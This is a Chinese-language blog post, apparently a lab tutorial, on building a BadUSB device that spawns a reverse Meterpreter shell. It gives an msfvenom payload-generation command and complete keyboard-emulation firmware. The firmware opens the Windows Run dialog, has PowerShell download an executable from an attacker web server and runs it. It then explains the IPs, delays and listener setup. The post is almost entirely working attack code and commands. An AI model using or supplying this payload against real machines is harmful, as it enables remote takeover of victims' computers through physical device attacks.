badusb_反弹meterpreter

转载请注明来自 b0t0w1’blog

本次思路是在本地生成 exploit,放在服务器上可供下载或者直接在本地搭建服务器。

生成 exploit:


msfvenom -p payload lhost=192.168.99.130 lport=4444 -f exe -o 1.exe

烧录payload:

char *command1 = "powershell -Command $clnt = new-object System.Net.WebClient;$url= 'http://192.168.99.132/1.exe';$file = ' %HOMEPATH%\\1.exe ';$clnt.DownloadFile($url,$file);";
char *command2 = "%HOMEPATH%\\1.exe";
void setup() { 
    delay(5000);
    omg(command1);
    delay(10000);
    omg(command2);
 }

void loop() {}
void omg(char *SomeCommand)
{
  Keyboard.set_modifier(128); 
  Keyboard.set_key1(KEY_R);
  Keyboard.send_now(); 
  Keyboard.set_modifier(0); 
  Keyboard.set_key1(0); 
  Keyboard.send_now(); 
  delay(1500);
  Keyboard.println(SomeCommand);
}

生成的exploit的ip和端口为监听机的地址及端口。
烧录的payload同样来自于kali set工具集,用杨依赖于powershell。需要注意以下几点:
1、commond1的命令是从指定ip(192.168.99.132)下载指定文件(1.exe),ip不一定是监听机,而是你搭建好的、存放着exploit的服务器ip
2、我在另一个虚拟机上搭建了web,上传1.exe,ip地址为192.168.99.132
3、默认下载的位置是在环境变量 HOMEPATH 的位置,command2就是运行exploit(第8行),第七行代码会延迟10妙供下载,可以根据实际改变。
监听选用meterpreter,
badusb_反弹meterpreter_第1张图片
附服务器(192.168.99.132)的日志,确实有靶机的访问记录。
这里写图片描述

转载请注明来自 b0t0w1’blog

你可能感兴趣的:(badusb)